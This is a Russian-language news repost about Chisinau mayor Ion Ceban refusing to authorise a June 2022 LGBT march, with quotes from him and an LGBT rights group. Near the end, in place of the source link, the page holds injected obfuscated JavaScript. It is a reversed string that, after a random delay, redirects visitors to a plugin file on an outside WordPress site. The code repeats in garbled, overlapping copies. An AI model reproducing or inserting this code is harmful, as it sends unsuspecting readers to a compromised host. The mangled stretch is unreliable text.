Дети не должны это видеть!

Дети не должны это видеть: мэр Кишинева выступил против ЛГБТ-марша в городе

Мэр молдавской столицы Ион Чебан отказался подписывать разрешение на проведение в Кишиневе гей-парада, а ЛГБТ-сообщество настаивает на том, что мероприятие состоится.

13 июня 2022 года мэр Кишинева Ион Чебан рассказал, что не подписал разрешение на «марш гордости», намеченный ЛГБТ-сообществом на 19 июня, потому что это ведет к разделению общества и хаосу. Об этом он рассказал в эфире телеканала 8TV, сообщили на сайте tv8.md.

«Гей-парад должен проводиться дома у тех, кто этого хочет. Я не подписывал и не подпишу разрешения. Мы не против кого-то, но пусть гомосексуальные парады устраивают у себя дома. <…> Это моя позиция, позиция моих коллег, это позиция многих граждан, которые этого не хотят», – сказал Чебан и добавил, что не понимает смысла ЛГБТ-мероприятия, ведь права меньшинств, связанные с образованием или работой, в Молдове не нарушаются.

Мэр подчеркнул, что публичные мероприятия ЛГБТ-сообщества всегда вызывают «разделение общества и хаос на улицах». «Дети не должны этого видеть. Давайте сосредоточимся на других акциях и событиях», – заключил мэр Кишинева.

«На связь с командой TV8.md вышла Анжелика Фролова, представитель НКО «ГЕНДЕРДОК-М», защищающего ЛГБТ в Молдове, и сказала нам, что мэр не имеет права не подписывать декларацию о марше», – сообщили на 8TV. По их словам, Фролова заявила, что «марш состоится»

Как писал СПЖ, в Гагаузии запретили пропаганду нетрадиционных отношений и марши ЛГБТ.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-videty-mer-kishineva-vystupil-protiv-lgbt-marsha-v-gorode» target=»_blank» rel=»noreferrer noopener»>Источник

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.5/5

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.